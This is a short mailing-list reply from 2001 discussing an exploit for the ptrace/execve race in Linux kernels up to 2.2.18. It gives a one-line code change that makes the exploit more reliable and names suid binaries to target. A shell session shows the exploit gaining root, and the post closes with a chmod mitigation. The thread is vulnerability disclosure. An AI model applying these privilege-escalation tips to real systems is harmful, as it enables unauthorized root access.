Mariusz Woloszyn wrote:
>
> On Tue, 27 Mar 2001, Wojciech Purczynski wrote:
>
> >
> > Hi,
> >
> > Here is exploit for ptrace/execve race condition bug in Linux kernels up
> > to 2.2.18.
> >
>
> Hi!
>
> I've seen a tool that works better than this, useing different aproach to
> the same bug explits it on all platforms giving instant root without the
> need for cat garbage files to clear disk cache!!!
Even with the original exploit code there is a 99.99% chance to gain root access, if
you change the
line:
regs.eip=eip;
to:
regs.eip=regs.esp;
and don't call objdump on the targetted binary before (use only the binary name as
argument to
epcs). At least with 'exotic' suid binaries like uux or gpasswd which are *never* in
the disk cache
you will get instant root too.
paul@ps:/usr/home/paul/tmp2 > ./epcs /usr/bin/gpasswd
Bug exploited successfully.
sh-2.04# id
uid=0(root) gid=0(root) groups=100(users)
sh-2.04#
Clever admins would chmod 4511 their suid binaries.
Ihq.
